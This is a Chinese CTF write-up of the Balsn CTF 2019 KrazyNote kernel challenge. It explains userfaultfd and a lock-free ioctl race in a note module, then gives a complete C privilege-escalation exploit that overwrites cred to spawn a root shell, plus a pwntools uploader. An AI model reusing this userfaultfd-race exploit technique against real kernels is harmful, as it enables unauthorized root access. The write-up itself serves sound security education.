转自我的https://xz.aliyun.com/t/6653
本文所有测试文件地址见:[https://github.com/bsauce/CTF/tree/master/KrazyNote-Balsn%20CTF%202019](https://github.com/bsauce/CTF/tree/master/KrazyNote-Balsn CTF 2019)
userfaltfd在内核漏洞利用中非常有用,借这道题来学习一下。
一、背景知识
1.提权
内核提权一般需要利用漏洞来修改task_struct中的cred结构,commit_cred(prepare_kernel_creds(0))会帮你找到cred结构并修改。
SMEP防止在内核态执行用户态代码,采用ROP来绕过;SMAP防止内核态使用用户态数据,切断了用户态的ROP,可以copy_from_user和copy_to_user来绕过SMAP。
2.页和虚内存
内核的内存主要有两个区域,RAM和交换区,即将被使用的内存保存在RAM中,暂时不被使用的内存放在交换区,内核控制交换进出过程。RAM中地址是物理地址,而内核使用虚地址,所以通过页表建立虚地址到物理地址的映射。虚拟页和物理页大小都是0x1000字节,64位系统下需252个页,还是很大,可采用多级页表
3.页调度与延迟加载
有的内存既不在RAM也不在交换区,例如mmap创建的内存映射页。mmap页在read/write访问之前,实际上还没有创建(还没有映射到实际的物理页),例如:mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE, fd, 0);
内核并未将fd内容拷贝到0x1337000,只是将地址0x1337000映射到文件fd。
当有如下代码访问时:
char *a = (char *)0x1337000
printf("content: %c\n", a[0]);
若发生对该页的引用,则(1)为0x1337000创建物理帧,(2)从fd读内容到0x1337000,(3)并在页表标记合适的入口,以便识别0x1337000虚地址。如果是堆空间映射,仅第2步不同,只需将对应物理帧清0。
总之,若首次访问mmap创建的页,会耗时很长,会导致上下文切换和当前线程的睡眠。
4.别名页 Alias pages
没有ABI能直接访问物理页,但内核有时需要修改物理帧的值(例如修改页表入口),于是引入了别名页,将物理帧映射到虚拟页。在每个线程的启动和退出的页表中,所以大多数物理帧有两个虚拟页映射到它,这就是“别名”的由来。通常别名页的地址是SOME_OFFSET + physical address。
5.userfaultfd
userfaultfd机制可以让用户来处理缺页,可以在用户空间定义自己的page fau handler。用法请参考官方文档,含示例代码,见文件userfaultfd_demo.c。
Step 1: 创建一个描述符uffd
所有的注册内存区间、配置和最终的缺页处理等就都需要用ioctl来对这个uffd操作。ioctl-userfaultfd支持UFFDIO_API、UFFDIO_REGISTER、UFFDIO_UNREGISTER、UFFDIO_COPY、UFFDIO_ZEROPAGE、UFFDIO_WAKE等选项。比如UFFDIO_REGISTER用来向userfaultfd机制注册一个监视区域,这个区域发生缺页时,需要用UFFDIO_COPY来向缺页的地址拷贝自定义数据。
# 2 个用于注册、注销的ioctl选项:
UFFDIO_REGISTER 注册将触发user-fault的内存地址
UFFDIO_UNREGISTER 注销将触发user-fault的内存地址
# 3 个用于处理user-fault事件的ioctl选项:
UFFDIO_COPY 用已知数据填充user-fault页
UFFDIO_ZEROPAGE 将user-fault页填零
UFFDIO_WAKE 用于配合上面两项中 UFFDIO_COPY_MODE_DONTWAKE 和
UFFDIO_ZEROPAGE_MODE_DONTWAKE模式实现批量填充
# 1 个用于配置uffd特殊用途的ioctl选项:
UFFDIO_API 它又包括如下feature可以配置:
UFFD_FEATURE_EVENT_FORK (since Linux 4.11)
UFFD_FEATURE_EVENT_REMAP (since Linux 4.11)
UFFD_FEATURE_EVENT_REMOVE (since Linux 4.11)
UFFD_FEATURE_EVENT_UNMAP (since Linux 4.11)
UFFD_FEATURE_MISSING_HUGETLBFS (since Linux 4.11)
UFFD_FEATURE_MISSING_SHMEM (since Linux 4.11)
UFFD_FEATURE_SIGBUS (since Linux 4.14)
// userfaultfd系统调用创建并返回一个uffd,类似一个文件的fd
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
STEP 2. 用ioctl的UFFDIO_REGISTER选项注册监视区域
// 注册时要用一个struct uffdio_register结构传递注册信息:
// struct uffdio_range {
// __u64 start; /* Start of range */
// __u64 len; /* Length of range (bytes) */
// };
//
// struct uffdio_register {
// struct uffdio_range range;
// __u64 mode; /* Desired mode of operation (input) */
// __u64 ioctls; /* Available ioctl() operations (output) */
// };
addr = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)
// addr 和 len 分别是我匿名映射返回的地址和长度,赋值到uffdio_register
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
// mode 只支持 UFFDIO_REGISTER_MODE_MISSING
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
// 用ioctl的UFFDIO_REGISTER注册
ioctl(uffd, UFFDIO_REGISTER, &uffdio_register);
STEP 3. 创建一个处理专用的线程轮询和处理”user-fault”事件
要使用userfaultfd,需要创建一个处理专用的线程轮询和处理”user-fault”事件。主进程中就要调用pthread_create创建这个自定义的handler线程:
// 主进程中调用pthread_create创建一个fault handler线程
pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
一个自定义的线程函数举例如下,这里处理的是一个普通的匿名页用户态缺页,我们要做的是把我们一个已有的一个page大小的buffer内容拷贝到缺页的内存地址处。用到了poll函数轮询uffd,并对轮询到的UFFD_EVENT_PAGEFAULT事件(event)用拷贝(ioctl的UFFDIO_COPY选项)进行处理。
注意:如果写exp只需处理一次缺页,可以不用循环。
static void * fault_handler_thread(void *arg)
{
// 轮询uffd读到的信息需要存在一个struct uffd_msg对象中
static struct uffd_msg msg;
// ioctl的UFFDIO_COPY选项需要我们构造一个struct uffdio_copy对象
struct uffdio_copy uffdio_copy;
uffd = (long) arg;
......
for (;;) { // 此线程不断进行polling,所以是死循环
// poll需要我们构造一个struct pollfd对象
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
poll(&pollfd, 1, -1);
// 读出user-fault相关信息
read(uffd, &msg, sizeof(msg));
// 对于我们所注册的一般user-fault功能,都应是UFFD_EVENT_PAGEFAULT这个事件
assert(msg.event == UFFD_EVENT_PAGEFAULT);
// 构造uffdio_copy进而调用ioctl-UFFDIO_COPY处理这个user-fault
uffdio_copy.src = (unsigned long) page;
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
// page(我们已有的一个页大小的数据)中page_size大小的内容将被拷贝到新分配的msg.arg.pagefault.address内存页中
ioctl(uffd, UFFDIO_COPY, &uffdio_copy);
......
}
}
二、漏洞分析
1.init_module()函数
void init_module()
{
bufPtr = bufStart;
return misc_register(&dev);
}
dev是struct miscdevice结构
struct miscdevice {
int minor;
const char *name;
const struct file_operations *fops;
struct list_head list;
struct device *parent;
struct device *this_device;
const struct attribute_group **groups;
const char *nodename;
umode_t mode;
};
#在IDA中看dev结构,dev_name是"note",fops指向0x680处。
.data:0000000000000620 dev db 0Bh ; DATA XREF: init_module+5↑o
.data:0000000000000620 ; cleanup_module+5↑o
.data:0000000000000621 db 0
.data:0000000000000622 db 0
.data:0000000000000623 db 0
.data:0000000000000624 db 0
.data:0000000000000625 db 0
.data:0000000000000626 db 0
.data:0000000000000627 db 0
.data:0000000000000628 dq offset aNote ; "note"
.data:0000000000000630 dq offset unk_680
.data:0000000000000638 align 80h
.data:0000000000000680 unk_680 db 0 ; DATA XREF: .data:0000000000000630↑o
// file_operations结构
struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
ssize_t (*read_iter) (struct kiocb *, struct iov_iter *);
ssize_t (*write_iter) (struct kiocb *, struct iov_iter *);
int (*iopoll)(struct kiocb *kiocb, bool spin);
int (*iterate) (struct file *, struct dir_context *);
int (*iterate_shared) (struct file *, struct dir_context *);
__poll_t (*poll) (struct file *, struct poll_table_struct *);
long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
... truncated
};
unk_680对应file_operations结构,发现只定义了open和unlocked_ioctl函数,其他都是null。unlocked_ioctl和compat_ioctl有区别,unlocked_ioctl不使用内核提供的全局同步锁,所有的同步原语需自己实现,所以可能存在条件竞争漏洞。
2.unlocked_ioctl()函数
unlocked_ioctl()函数实现4个功能:new/edit/show/delete。
// 从用户缓冲区userPtr拷贝参数到req结构, note length / note content
void * unlocked_ioctl(file *f, int operation, void *userPtr)
{
char encBuffer[0x20];
struct noteRequest req;
memset(encBuffer, 0, sizeof(encBuffer));
if ( copy_from_user(&req, userPtr, sizeof(req)) )
return -14;
/* make note, view note, edit note, delete note */
return result;
}
// noteRequest结构——用户参数
struct noteRequest{
size_t idx;
size_t length;
size_t userptr;
}
// note结构——存储的note
struct note {
unsigned long key;
unsigned char length;
void *contentPtr;
char content[];
}
//(1) new note功能, operation == -256
/* 创建note,从bufPtr分配空间,从current_task获取key(task_struct.mm->pgd,页全局目录的存放位置),对content进行XOR加密。最后将(¬e->content - page_offset_base)值保存,别名页的地址是【SOME_OFFSET + physical address】,page_offset_base就是这个SOME_OFFSET。没开kaslr时,page_offset_base固定,否则随机化。
注意:length长度范围是0~0x100,从汇编指令可看出来`movzx ecx, byte ptr [rsp+140h+req.length]`,是byte级赋值操作。
*/
if ( operation == -256 )
{
idx = 0;
while ( 1 )
{
if (!notes[idx])
break;
if (++idx == 16)
return -14LL;
} // 从全局数组notes找到空位,最多16个note
new = (note *)bufPtr;
req.noteIndex = idx;
notes[idx] = (struct note *)bufPtr;
new->length = req.noteLength;
new->key = *(void **)(*(void **)(__readgsqword((unsigned __int64)¤t_task) + 0x7E8) + 80);// ????
bufPtr = &new->content[req.length];
if ( req.length > 0x100uLL )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, req.length);
BUG();
}
_check_object_size(encBuffer, req.length, 0LL);
copy_from_user(encBuffer, userptr, req.length);
length = req.length;
if ( req.length )
{
i = 0LL;
do
{
encBuffer[i / 8] ^= new->key; // encryption
i += 8LL;
}
while ( i < length );
}
memcpy(new->content, encBuffer, length);
new->contentPtr = &new->content[-page_offset_base];// 注意 page_offset_base
return 0;
//(2) delete功能:清空note数组,把bufPtr指向全局缓冲区开头,并清0。
ptr = notes;
if (operation == -253)
{
do
{
*ptr = 0LL;
++ptr;
}
while (ptr < note_end);
bufPtr = bufStart;
memset(bufStart, 0, sizeof(bufStart));
return 0;
// (3) edit功能。注意copy_from_user很耗时,能增大race的成功率
if (operation == -255)
{
note = notes[idx];
if ( note )
{
length = note->length;
userptr = req.userptr;
contentPtr = (note->contentPtr + page_offset_base);
_check_object_size(encBuffer, length, 0LL);
copy_from_user(encBuffer, userptr, length);
if ( length )
{
i = 0;
do
{
encBuffer[i/8] ^= note->key;
i += 8LL;
}
while (length > i);
memcpy(contentPtr, encBuffer, length)
}
return 0LL;
}
}
// (4) show功能。将content用XOR解密后用copy_to_user打印出来。
if ( (_DWORD)operation == -254 )
{
tmp_note2 = (note *)global_notes[note_idx2];
result = 0LL;
if ( tmp_note2 )
{
len = LOBYTE(tmp_note2->length);
contentPtr2 = (_DWORD *)(tmp_note2->contentPtr + page_offset_base);
memcpy(encBuffer, contentPtr, len)
}
if ( len )
{
ji_2 = 0LL;
do
{
encBuffer[ji_2 / 8] ^= tmp_note2->key;
ji_2 += 8LL;
}
while ( ji_2 < len );
}
userptr = req.userptr;
_check_object_size(encBuffer, len, 1LL);
copy_to_user(userptr, encBuffer, len);
result = 0LL;
}
3.漏洞
考虑以下两线程:
| thread 1 | thread 2 |
|---|---|
| edit note 0 (size 0x10) | idle |
| copy_from_user | idle |
| idle | delete all notes |
| idle | add note 0 with size 0x0 |
| idle | add note 1 with size 0x0 |
| continue edit of note 0 (size 0x10) | idle |
由于edit时copy_from_user首次访问mmap地址,触发缺页处理函数,等线程2删除所有note并重新添加两个note后,线程1才继续编辑note 0,此时的编辑content size还是0x10,所以就会产生溢出。
三、漏洞利用
1.利用方法
目标:若伪造note结构,就能构造任意地址读写。
// note结构
struct note {
unsigned long key;
unsigned char length;
void *contentPtr;
char content[];
}
key值泄露:若读取note 0,则会将加密后的null字节也打印出来,其实就是key值。
| 0x0 | note 0, with content size 0x10 |
|---|---|
| 0x18 | note 1 |
| 0x30 | NULL’ed out data |
module基址泄露:得到key后,可以得到contentPtr值,contentPtr须加上page_base_offset才是真实指针。就能以module的.bss相对地址进行任意读写,可读出notes数组从而泄露module基址。
内核基址泄露:可读取module的0x6c处的.text:000000000000006C call _copy_from_user来泄露内核基址。
page_offset_base泄露:读取.text:00000000000001F7 mov r12, cs:page_offset_base处的4字节偏移page_offset_base_offset,再读取page_offset_base_offset + 0x1fe + mudule_base处的值,就是page_offset_base的值。为什么非要泄露它呢,因为读/写都是以它为基地址。
// 泄露内核基址:读取0x6c处的值,取出32位offset,加上pc即可得到copy_from_user函数地址。
unsigned long leak = read64(0x6c + moduleBase);
long int offset = *((int *)(((char *)&leak) + 1)) + 5;
copy_from_user = offset + moduleBase + 0x6c;
2.exploit
为了准确控制线程1在copy_from_user或copy_to_user处停住,需用到userfaultfd(处理用户空间的页错误)。注意本题的漏洞根本原因在于使用了unlocked_ioctl,对全局数组notes进行访问时没有上锁,所以才能用userfaultfd在copy_from_user处暂停。
触发溢出步骤:
(1)创建1个content length长度为0x10的note。
(2)创建1个userfalut fd,来监视0x1337000地址处的页错误。
(3)对note0 进行edit,并利用mmap将传进去的userptr指针指向0x1337000地址空间。
(4)在edit note0执行到copy_from_user时,进入页错误处理程序。
(5)也错误处理程序中,清空notes,并创建note0/note1,content length都是0。
(6)恢复执行edit note0,将note1的content length覆盖为0xf0。
(7)触发溢出。
利用步骤:
(1)泄露key:输出note1,content内容为NULL,输出内容会与key异或,仍为key。
(2)泄露module_base:创建note2,输出note1,会输出note2的contentPtr指针,即可计算出module_base。
(3)泄露page_offset_base:edit note1,将note2的contentPtr改成module_base+0x1fa,.text:00000000000001F7 mov r12, cs:page_offset_base,show note2泄露page_offset_base在module中的偏移page_offset_base_offset;edit note,将note2的contentPtr改成module_base+0x1fe+page_offset_base_offset,泄露出page_offset_base。
(4)搜索cred地址:利用prctl的PR_SET_NAME功能搜索到task_struct结构,(满足条件:real_cred—NAME前0x10处和cred—NAME前0x8处指针值相等且位于内核空间,大于0xffff000000000000);将note2的contentPtr覆盖为cred_addr-page_offset_base+4。
(5)修改cred提权。
EXP如下:见exp_cred.c。
// gcc -static -pthread xx.c -g -o xx
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <poll.h>
#include <pthread.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <poll.h>
#include <sys/prctl.h>
#include <stdint.h>
typedef struct _noteRequest
{
size_t idx;
size_t length;
char* userptr;
}noteRequest;
int fd;
void init()
{
fd = open("/dev/note", 0);
if (fd<0)
exit(-1);
puts("[+] init done!");
}
void errExit(char* msg)
{
puts(msg);
exit(-1);
}
void create(char* buf, uint8_t length)
{
noteRequest req;
req.length = length;
req.userptr = buf;
if (ioctl(fd, -256, &req) < 0)
errExit("[-] Failed to create!");
}
void edit(uint8_t idx, char* buf, uint8_t length)
{
noteRequest req;
req.length = length;
req.userptr = buf;
req.idx = idx;
if (ioctl(fd, -255, &req) < 0)
errExit("[-] Failed to edit!");
}
void show(uint8_t idx, char* buf)
{
noteRequest req;
req.userptr = buf;
req.idx = idx;
if (ioctl(fd, -254, &req) < 0)
errExit("[-] Failed to show!");
}
void delete()
{
noteRequest req;
if (ioctl(fd, -253, &req) < 0)
errExit("[-] Failed to delete!");
}
char buffer[0x1000];
#define FAULT_PAGE ((void*)(0x1337000))
void* handler(void *arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long)arg;
puts("[+] Handler created");
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready != 1) // 这会一直等待,直到copy_from_user访问FAULT_PAGE
errExit("[-] Wrong pool return value");
printf("[+] Trigger! I'm going to hang\n");
//现在主线程停在copy_from_user函数了,可以进行利用了
delete();
create(buffer, 0);
create(buffer, 0);
// 原始内存:note0 struct + 0x10 buffer
// 当前内存:note0 struct + note1 struct
// 当主线程继续拷贝时,就会破坏note1区域
if (read(uffd, &msg, sizeof(msg)) != sizeof(msg)) // 偶从uffd读取msg结构,虽然没用
errExit("[-] Error in reading uffd_msg");
struct uffdio_copy uc;
memset(buffer, 0, sizeof(buffer));
buffer[8] = 0xf0; //把note1 的length改成0xf0
uc.src = (unsigned long)buffer;
uc.dst = (unsigned long)FAULT_PAGE;
uc.len = 0x1000;
uc.mode = 0;
ioctl(uffd, UFFDIO_COPY, &uc); // 恢复执行copy_from_user
puts("[+] done 1");
return NULL;
}
void register_userfault()
{
struct uffdio_api ua;
struct uffdio_register ur;
pthread_t thr;
uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
ua.api = UFFD_API;
ua.features = 0;
if (ioctl(uffd, UFFDIO_API, &ua) == -1) // create the user fault fd
errExit("[-] ioctl-UFFDIO_API");
if (mmap(FAULT_PAGE, 0x1000, 7, 0x22, -1, 0) != FAULT_PAGE)//create page used for user fault
errExit("[-] mmap fault page");
ur.range.start = (unsigned long)FAULT_PAGE;
ur.range.len = 0x1000;
ur.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
errExit("[-] ioctl-UFFDIO_REGISTER"); //注册页地址与错误处理fd,这样只要copy_from_user
//访问到FAULT_PAGE,则访问被挂起,uffd会接收到信号
int s = pthread_create(&thr, NULL, handler, (void*)uffd);
if (s!=0)
errExit("[-] pthread_create"); // handler函数进行访存错误处理
}
int main(int argc, char const *argv[])
{
init();
create(buffer, 0x10); // memory layout: note struct + 0x10 buffer
register_userfault(); // register the user fault
edit(0, FAULT_PAGE, 1);
/* 漏洞在于edit没有实现锁,所以执行到copy_from_user时访存错误被挂起,
notes被其他线程篡改,copy_from_user继续运行时导致OOB 和 R&W */
// 1.leak key
show(1, buffer);
unsigned long key = *(unsigned long *)buffer;
create(buffer, 0); // note2: can be overwritten
// 2. leak module base
show(1,buffer);
unsigned long bss_addr = *(unsigned long*) (buffer + 0x10) ^ key;
unsigned long module_base = bss_addr - 0x2568;
printf("[+] key=0x%lx module_base=0x%lx\n", key, module_base);
// 3. leak base addr, not kernel_base
unsigned long page_offset_base = module_base + 0x1fa;
unsigned long* fake_note = (unsigned long*)buffer;
fake_note[0] = 0 ^ key; // note2的key变成0
fake_note[1] = 4 ^ key;
fake_note[2] = page_offset_base ^ key;
edit(1, buffer, 0x18);
int page_offset_base_offset;
show(2, (char*)&page_offset_base_offset);
printf("[+] page_offset_base_offset = 0x%x\n", page_offset_base_offset);
//0x1f7处是指令 .text:00000000000001F7 mov r12, cs:page_offset_base
// .text:00000000000001FE add r12, [rax+10h]
// 计算存基址的地址,并读出该地址
page_offset_base = module_base + 0x1fe + page_offset_base_offset;
printf("[+] page_offset_base = 0x%lx\n", page_offset_base);
fake_note[1] = 8 ^ key;
fake_note[2] = page_offset_base ^ key;
edit(1, buffer, 0x18);
unsigned long base_addr;
show(2, (char *)&base_addr);
printf("[+] base_addr = 0x%lx\n", base_addr);
// 4. search cred 注意:都是相对base_addr找的,所以从偏移0开始找
if (prctl(PR_SET_NAME, "try2findmesauce") < 0)
errExit("[-] prctl set name failed");
unsigned long* task;
for (size_t off = 0; ; off += 0x100) // 由于length只能是1字节,所以1次只能读0xff
{
fake_note[0] = 0 ^ key;
fake_note[1] = 0xfff ^ key;
fake_note[2] = off ^ key;
edit(1, buffer, 0x18);
memset(buffer, 0, 0x100);
show(2, buffer);
task = (unsigned long*)memmem(buffer, 0x100, "try2findmesauce", 14);
if (task != NULL)
{
printf("[+] found: %p 0x%lx, 0x%lx\n", task, task[-1], task[-2]);
if (task[-1] > 0xffff000000000000 && task[-2] > 0xffff000000000000) // 确保cred地址在内核空间
break;
}
}
// 5. change cred to 0
fake_note[0] = 0 ^ key;
fake_note[1] = 0x28 ^ key;
fake_note[2] = (task[-2] + 4 - base_addr) ^ key; // 注意一定是修改相对base_addr的地址
edit(1, buffer, 0x18);
int fake_cred[8];
memset(fake_cred, 0, sizeof(fake_cred));
edit(2, (char*)fake_cred, 0x28);
char* args[2] = {"/bin/sh", NULL};
execv("/bin/sh", args);
return 0;
}
想利用call_usermodehelper方法来写,但发现prctl_hook怎么都修改不了(可能是系统不允许修改prctl_hook)。报错信息如下:
不过可以改modprobe_path,利用脚本见exp_modprobe.c。
/home/note # ./test
[+] init done!
[+] Handler created
[+] Trigger! I'm going to hang
[+] done 1
[+] key=0xffff9a3f0ea52000 module_base=0x65c0c00f0000
[+] page_offset_base_offset = 0xe5babaa2
[+] page_offset_base = 0x65c0a5c9bca0
[+] base_addr = 0xffff9a3f00000000
[+] real module_base = 0xffffffffc00f0000
[+] kernel_base = 0xffffffffa4e00000
[+] order_cmd_addr = 0xffffffffa5e5d940
[+] prctl_hook_addr = 0xffffffffa5cb0460
[+] poweroff_work_func_addr = 0xffffffffa4ead300
[*] Wait 1!
1
[*] Wait 2!2
[ 16.235460] BUG: unable to handle kernel paging request at ffffffffa5cb0460
[ 16.238245] #PF error: [PROT] [WRITE]
[ 16.239130] PGD 9c12067 P4D 9c12067 PUD 9c13063 PMD eb8a163 PTE 8000000009ab0061
[ 16.240921] Oops: 0003 [#1] SMP PTI
[ 16.241536] CPU: 0 PID: 169 Comm: test Tainted: G OE 5.1.9 #1
[ 16.242241] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 16.243084] RIP: 0010:0xffffffffc00f034f
[ 16.243980] Code: de e8 65 7d 31 e5 48 2b 2d 6e b9 ba e5 31 c0 49 89 6c 24 10 e9 eb fd ff ff 48 8b 44 24 18 49 8d 7c 24 08 48 89 de 48 83 e7 f8 <49> 89 04 24 89 e8 48 8b 54 03 f8 49 89 54 04 f8 49 29 fc 31 c0 4c
[ 16.246040] RSP: 0018:ffffb4a9c0233d40 EFLAGS: 00000282
[ 16.246269] RAX: ffffffffa4ead300 RBX: ffffb4a9c0233d58 RCX: ffffffffc00f2550
[ 16.246690] RDX: ffffffffc00f0000 RSI: ffffb4a9c0233d58 RDI: ffffffffa5cb0468
[ 16.247939] RBP: 0000000000000020 R08: ffffffffc00f0000 R09: 0000000000000000
[ 16.248679] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffffa5cb0460
[ 16.249253] R13: 00007fff98029c40 R14: 00007fff98029be0 R15: 0000000000000000
[ 16.250133] FS: 0000000001524880(0000) GS:ffff9a3f0f400000(0000) knlGS:0000000000000000
[ 16.251110] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 16.251654] CR2: ffffffffa5cb0460 CR3: 000000000ea52000 CR4: 00000000003006f0
[ 16.252143] Call Trace:
[ 16.253153] ? __ia32_sys_reboot+0x20/0x20
[ 16.254058] ? 0xffffffffc00f0000
[ 16.254712] do_vfs_ioctl+0xa1/0x620
[ 16.255031] ? vfs_read+0xfb/0x110
[ 16.255355] ksys_ioctl+0x66/0x70
[ 16.255582] __x64_sys_ioctl+0x16/0x20
[ 16.255829] do_syscall_64+0x55/0x110
[ 16.256102] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 16.256469] RIP: 0033:0x4468b7
[ 16.256807] Code: 48 83 c4 08 48 89 d8 5b 5d c3 66 0f 1f 84 00 00 00 00 00 48 89 e8 48 f7 d8 48 39 c3 0f 92 c0 eb 92 66 90 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 0f 83 5d 06 fc ff c3 66 2e 0f 1f 84 00 00 00 00
[ 16.257880] RSP: 002b:00007fff98029bc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[ 16.258288] RAX: ffffffffffffffda RBX: 00000000004002e0 RCX: 00000000004468b7
[ 16.258653] RDX: 00007fff98029be0 RSI: ffffffffffffff01 RDI: 0000000000000003
[ 16.259016] RBP: 00007fff98029c00 R08: 0000000000000000 R09: 0000000000000000
[ 16.259694] R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004073a0
[ 16.259853] R13: 0000000000407430 R14: 0000000000000000 R15: 0000000000000000
[ 16.260087] Modules linked in: note(OE)
[ 16.263528] CR2: ffffffffa5cb0460
[ 16.266388] ---[ end trace 5ced815cb65d3b46 ]---
[ 16.269277] RIP: 0010:0xffffffffc00f034f
[ 16.270061] Code: de e8 65 7d 31 e5 48 2b 2d 6e b9 ba e5 31 c0 49 89 6c 24 10 e9 eb fd ff ff 48 8b 44 24 18 49 8d 7c 24 08 48 89 de 48 83 e7 f8 <49> 89 04 24 89 e8 48 8b 54 03 f8 49 89 54 04 f8 49 29 fc 31 c0 4c
[ 16.271021] RSP: 0018:ffffb4a9c0233d40 EFLAGS: 00000282
[ 16.271331] RAX: ffffffffa4ead300 RBX: ffffb4a9c0233d58 RCX: ffffffffc00f2550
[ 16.271704] RDX: ffffffffc00f0000 RSI: ffffb4a9c0233d58 RDI: ffffffffa5cb0468
[ 16.272078] RBP: 0000000000000020 R08: ffffffffc00f0000 R09: 0000000000000000
[ 16.272486] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffffa5cb0460
[ 16.272858] R13: 00007fff98029c40 R14: 00007fff98029be0 R15: 0000000000000000
[ 16.273394] FS: 0000000001524880(0000) GS:ffff9a3f0f400000(0000) knlGS:0000000000000000
[ 16.273865] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 16.274193] CR2: ffffffffa5cb0460 CR3: 000000000ea52000 CR4: 00000000003006f0
[ 16.274679] Kernel panic - not syncing: Fatal exception
[ 16.275555] Kernel Offset: 0x23e00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[ 16.276853] Rebooting in 1 seconds..
问题
1.打包错误
#重新打包后会报错,可能是/bin/busybox 给的权限不对,chmod 777再打包就可以了
mount: you must be root
mount: you must be root
mount: you must be root
/etc/init.d/rcS: line 8: can't create /proc/sys/kernel/dmesg_restrict: nonexistent directory
/etc/init.d/rcS: line 9: can't create /proc/sys/kernel/kptr_restrict: nonexistent directory insmod:
can't insert 'note.ko': Operation not permitted
2.文件过大
可以参考这篇writeup,利用uclibc来编译二进制文件,环境配置比较麻烦,可直接下载一个配置好的系统。
3.上传文件并执行
#!/usr/bin/env python2
from pwn import *
def send_command(cmd, print_cmd = True, print_resp = False):
if print_cmd:
log.info(cmd)
p.sendlineafter("$", cmd)
resp = p.recvuntil("$")
if print_resp:
log.info(resp)
p.unrecv("$")
return resp
def send_file(name):
file = read(name)
f = b64e(file)
send_command("rm /home/note/a.gz.b64")
send_command("rm /home/note/a.gz")
send_command("rm /home/note/a")
size = 800
for i in range(len(f)/size + 1):
log.info("Sending chunk {}/{}".format(i, len(f)/size))
send_command("echo -n '{}'>>/home/note/a.gz.b64".format(f[i*size:(i+1)*size]), False)
send_command("cat /home/note/a.gz.b64 | base64 -d > /home/note/a.gz")
send_command("gzip -d /home/note/a.gz")
send_command("chmod +x /home/note/a")
def exploit():
send_file("exploit.gz")
#send_command("/home/note/a")
p.sendline("/home/note/a")
p.interactive()
if __name__ == "__main__":
#context.log_level = 'debug'
s = ssh(host="krazynote-3.balsnctf.com", port=54321, user="knote", password="knote", timeout=5)
p = s.shell('/bin/sh')
#p = process("./run.sh")
exploit()
参考
https://www.anquanke.com/post/id/189015
https://pr0cf5.github.io/ctf/2019/10/10/balsn-ctf-krazynote.html
https://github.com/Mem2019/Mem2019.github.io/blob/master/codes/krazynote.c
从内核到用户空间(1) — 用户态缺页处理机制 userfaultfd 的使用
http://man7.org/linux/man-pages/man2/userfaultfd.2.html
https://github.com/pr0cf5/CTF-writeups/blob/master/2019/BalsnCTF/knote/exploit.c
